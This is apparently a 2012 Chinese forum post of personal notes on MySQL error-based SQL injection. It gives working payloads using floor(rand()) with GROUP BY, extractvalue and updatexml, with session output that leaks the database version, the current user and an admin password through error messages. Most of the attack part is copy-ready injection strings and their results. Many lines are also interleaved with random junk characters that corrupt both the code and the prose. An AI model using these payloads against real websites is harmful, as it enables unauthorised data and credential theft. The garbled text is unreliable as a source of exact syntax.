放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。6 e1 d; }1 o2 ~9 |) T) s# p( @
实际测试环境:
0 r. V3 U0 `7 P8 f8 |7 Y* n. n5 F4 F4 h9 e" @
' a: @& O n! V2 X, X
mysql> show tables;9 a0 Q* N* D- @/ o$ {, Q
+----------------+
. w4 W+ ~7 x H4 }* }6 T| Tables_in_test |2 I$ G5 z: J3 L/ W q/ ^( h
+----------------+7 @; _& }! }; u) S. g) K4 z4 V
| admin |+ O* }: \! X; R
| article |1 c/ b* D2 `! Z( L
+----------------+4 p* C, o* b( R- K4 |
, }$ H3 z* d9 x3 [5 S8 U" w% v# L ) i( @ t( ~. \+ w. Y" K
% z$ B& W/ q) n! K2 f- ]( Pmysql> describe admin;) x" m: }7 y0 B! h6 {+ c- u. U3 |
+-------+------------------+------+-----+---------+----------------+
; p$ }+ q1 R1 U6 t| Field | Type | Null | Key | Default | Extra |+ X9 s" `& h f- k6 a5 o1 ^5 q
+-------+------------------+------+-----+---------+----------------+2 U/ `3 o2 b, ^
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |+ V* U8 C" i R, @# c- Y
| user | varchar(50) | NO | | NULL | |
, b. r# h. L) i- u| pass | varchar(50) | NO | | NULL | |$ Z: |5 c4 c) i. F0 _
+-------+------------------+------+-----+---------+----------------+
6 \4 u5 R# P1 g& b& Z; x% K4 m
& f- @- I; C/ Y
& I7 n% a% }5 o9 b. l
, J( w2 z6 ^" z9 d2 v( W! A) X2 L+ amysql> describe article;
W" {8 L+ @, }) z) j+---------+------------------+------+-----+---------+----------------+) d8 }7 b4 G' K1 r( D
| Field | Type | Null | Key | Default | Extra |
9 J, W$ |8 t! c3 {+---------+------------------+------+-----+---------+----------------+0 ?0 H. J5 o+ g# F7 Y
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
$ a6 S. H' K3 n7 n H- C| title | varchar(50) | NO | | NULL | |
7 z v3 h; v: K( k/ S" w| content | varchar(50) | NO | | NULL | |
$ i, L) J! }! f* f+---------+------------------+------+-----+---------+----------------+* _; n( y7 [+ K" @
1、通过floor报错* z( j P# O6 ~0 D! c/ N
可以通过如下一些利用代码
0 t5 v2 e1 \8 p/ j
. T: g, k7 x& @* i. _) E : ~0 U6 z# C, \$ j1 s
and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x- x; l1 q" i2 n* @* i
from information_schema.tables group by x)a);
3 A1 D) @ r7 w. s, ?* a0 E 2 ]' \8 Q) F* o0 h$ g- D
7 ?1 K' c: I5 V4 x' ^: Xand (select count(*) from (select 1 union select null union select !1)x
0 s8 ~' q5 l0 t) r0 Mgroup by concat((select table_name from information_schema.tables limit 1),
% [7 o. |4 C' X$ \( _1 afloor(rand(0)*2)));
" @9 g2 K m. W4 g7 x2 ~. F举例如下:
2 P- B% R# c1 |- x# R首先进行正常查询:
+ n0 L8 I& T4 P3 \; J : U4 J7 o8 O4 a q1 J. Z
mysql> select * from article where id = 1;
6 h) {5 D- q, g; k+----+-------+---------+4 z1 u& N" b3 R
| id | title | content |8 j, v2 S' D* r2 u
+----+-------+---------+
- W$ Z) k; ^% b" A! ]7 P| 1 | test | do it |
$ A: V8 J2 |' J, j9 _' l' T( ?4 Y, o+----+-------+---------+/ c7 ]) d5 E+ U8 v+ }# C1 M1 h
假如id输入存在注入的话,可以通过如下语句进行报错。) I2 p" `4 v% ]% P! g4 A2 V
0 Q' J" ~- q4 D% v" F
( `/ v* R9 u2 E8 l. ~
mysql> select * from article where id = 1 and (select 1 from
/ c( F+ Q1 J. T% r6 N$ Q(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);# l# b T- D; a1 ?
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
/ D/ n# u. p) g可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
' ?# f2 x6 I8 @3 W例如我们需要查询管理员用户名和密码:
S5 {1 C5 Z/ F: d3 n5 D- xMethod1:
7 H8 L$ ]- o6 j) z , c0 Y$ H: h* V' G. ^' T' A# z. B
9 Q9 q( R* E m2 C4 P# J% Vmysql> select * from article where id = 1 and (select 1 from" {+ W3 d/ H# {- ?
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
$ E2 U# g V6 efrom information_schema.tables group by x)a);
, C( e, e1 u" |+ ^6 B' G8 gERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
' Y& z1 m- Z, }/ r# EMethod2:
( Z3 _6 ^5 |# B% B0 e E
0 R2 j1 `$ b+ `7 ~& {# Z" U , _1 t+ U8 M8 g+ M% r
mysql> select * from article where id = 1 and (select count(*)' F! v6 }1 V& K/ q
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),$ r# G7 v: K' R8 ^2 R
floor(rand(0)*2)));
# S* F4 f! k1 Q( o: X" }ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'7 K7 k* b+ h) h5 d9 I
2、ExtractValue; f- L3 n4 i! A" S3 Z+ T$ z5 {
测试语句如下
( o) X4 S& |0 g5 y3 u 5 I' Z/ g- q) p0 S$ N: Y
* J7 X: U" }2 t% V0 a- E
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
`& }: m/ a7 N4 S* Z8 a$ q实际测试过程 D, I" `0 v, R7 v M
- L/ G, l0 G) N' P* q- c* H
. g7 O( d2 M0 ^4 Z% pmysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,, s* T6 Y; X5 N- O" |5 m2 f
(select pass from admin limit 1)));--
3 p, x/ m! V3 \' |$ a7 Y3 [! KERROR 1105 (HY000): XPATH syntax error: '\admin888') |! |0 J" x& |% l& D% }
3、UpdateXml
) t7 E: W* v7 |测试语句9 g9 ]! f3 E# E( ^# D4 i
. b/ v2 F! [8 I9 W1 s 8 u# `- \7 l& e5 L
and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))! u0 ], Y: }, N3 S6 k
实际测试过程3 d3 m8 o. c4 ?4 e! {; W
2 C5 ^6 c( F$ @# E p# v* a
; g! o8 [1 g7 L" pmysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
6 [6 @0 ]9 ~* [6 C/ y(select pass from admin limit 1),0x5e24),1));* \- K m: n! \' m. Y1 a0 I: f
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'$ W& _* r$ ?. h" [4 {6 W
All, thanks foreign guys.
! p4 |3 }& E! r ?5 C' g' z) k% {9 j
; a5 h6 k# B2 d7 N
, T3 ^4 i6 O+ B9 F; c; d |
发表于 2012-12-10 10:28:51
收藏
支持
反对